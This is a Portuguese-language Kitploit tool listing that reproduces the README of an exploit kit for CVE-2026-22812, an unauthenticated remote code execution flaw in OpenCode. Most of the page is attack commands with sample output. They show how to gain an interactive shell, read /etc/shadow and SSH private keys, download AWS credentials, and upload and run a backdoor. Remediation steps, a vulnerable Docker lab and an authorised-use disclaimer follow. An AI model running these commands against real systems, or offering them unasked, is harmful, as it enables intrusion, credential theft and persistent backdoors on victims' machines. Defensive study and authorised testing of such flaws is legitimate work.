Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22812-exploit — Kit de exploração para CVE-2026-22812 (RCE não autenticado no OpenCode) que fornece shell interativo, execução arbitrária de comandos, upload/download de arquivos e enumeração de sistema para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

Kit de exploração para CVE-2026-22812 (RCE não autenticado no OpenCode) que fornece shell interativo, execução arbitrária de comandos, upload/download de arquivos e enumeração de sistema para testes de segurança autorizados.

Ver Repositório
34620há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Exploração CVE-2026-22812

Python CVSS

Kit de exploração completo para CVE-2026-22812 - RCE não autenticado no OpenCode


🎯 Visão Geral

A Ferramenta de Exploração CVE-2026-22812 é um framework abrangente de exploração para a vulnerabilidade de execução remota de código não autenticada no OpenCode. Esta ferramenta fornece múltiplos métodos de exploração, incluindo shell interativo, operações de arquivos e enumeração de sistema.

Detalhes da Vulnerabilidade

  • ID CVE: CVE-2026-22812
  • Afetado: OpenCode < 1.0.216
  • Pontuação CVSS: 8.8 (Alta)
  • Vetor de Ataque: Rede
  • Autenticação: Nenhuma Necessária
  • Impacto: Comprometimento total do sistema

✨ Recursos

🔓 Capacidades de Exploração

  • ✅ Criação de Sessão Não Autenticada
  • ✅ Execução Arbitrária de Comandos (RCE)
  • ✅ Shell Interativo com histórico de comandos
  • ✅ Upload/Download de Arquivos
  • ✅ Leitura Arbitrária de Arquivos
  • ✅ Criação de Sessão PTY
  • ✅ Enumeração de Sistema
  • ✅ Suporte a Proxy (compatível com Burp Suite)

📦 Instalação

Pré-requisitos

  • Python 3.7+
  • pip
  • Biblioteca requests

Instalação Rápida

# Clonar repositório
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Instalar dependências
pip3 install -r requirements.txt

Instalação Manual

pip3 install requests urllib3

🚀 Uso

Exploração Básica

1. Verificar se o Alvo é Vulnerável

python3 exploit.py -t http://192.168.1.10:4096 --verify

Saída:

[+] O alvo está VULNERÁVEL ao CVE-2026-22812!
[+] ID da Sessão: abc123def456

2. Executar Comando Único

python3 exploit.py -t http://192.168.1.10:4096 -c "id"

Saída:

[*] Criando sessão...
[+] Sessão criada: abc123def456
[+] O alvo está VULNERÁVEL!

[*] Executando: id
[+] Comando executado com sucesso

uid=1000(developer) gid=1000(developer) groups=1000(developer)

3. Modo Shell Interativo

python3 exploit.py -t http://192.168.1.10:4096 -i

Sessão Interativa:

[+] Sessão criada: abc123def456
[+] O alvo está VULNERÁVEL!

[*] Entrando no modo shell interativo
[!] Digite 'help' para comandos, 'exit' para sair

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Lendo arquivo: /etc/hostname
[+] Arquivo lido com sucesso (10 bytes)
dev-server-01

developer@target$ exit
[*] Saindo...

📚 Uso Detalhado

Execução de Comandos

# Comando único
python3 exploit.py -t http://target:4096 -c "whoami"

# Comando complexo
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Múltiplos comandos
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"

Operações de Arquivos

Ler Arquivos

# Ler arquivos sensíveis
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa

Enviar Arquivos

# Enviar script shell
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Enviar binário
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Enviar com execução
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"

Baixar Arquivos

# Baixar configuração
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Baixar credenciais
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Baixar código-fonte
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json

Enumeração de Sistema

# Coletar informações do sistema
python3 exploit.py -t http://target:4096 --sysinfo

Saída:

{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}

Remediação

  1. Atualize imediatamente: npm install -g opencode-ai@latest
  2. Encerre processos: pkill -f opencode
  3. Verifique logs: Revise os logs do sistema em busca de indicadores de comprometimento
  4. Rotacione credenciais: Altere senhas, chaves SSH
  5. Audite sistemas: Verifique a presença de backdoors

🧪 Configuração do Laboratório de Testes

Usando Docker (Recomendado)

# Dockerfile para OpenCode vulnerável
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
# Construir e executar
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Testar exploit
python3 exploit.py -t http://localhost:4096 -i

Configuração Manual

# Instalar versão vulnerável
npm install -g [email protected]

# Iniciar OpenCode
opencode

# Em outro terminal, executar o exploit
python3 exploit.py -t http://localhost:4096 --verify

⚠️ Nunca implante versões vulneráveis em produção!


📚 Referências

Informações da Vulnerabilidade

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
  • Aviso do GitHub: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
  • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

⚠️ Aviso Legal

LEIA COM ATENÇÃO

Esta ferramenta é fornecida SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS.

❌ Uso Proibido

  • Acesso não autorizado a sistemas
  • Escaneamento sem permissão
  • Quaisquer atividades ilegais
  • Propósitos maliciosos
  • Sistemas de produção sem autorização

Aviso Legal

Os autores:

  • NÃO endossam uso ilegal
  • NÃO são responsáveis por uso indevido
  • NÃO apoiarão atividades ilegais
  • NÃO ASSUMEM NENHUMA RESPONSABILIDADE

Ao usar esta ferramenta, você concorda em:

  • Obter autorização adequada
  • Cumprir todas as leis
  • Aceitar total responsabilidade
  • Usar de forma ética e responsável

USE POR SUA CONTA E RISCO


⭐ Marque com estrela se for útil! ⭐
Somente para testes de segurança autorizados

Baixar ferramenta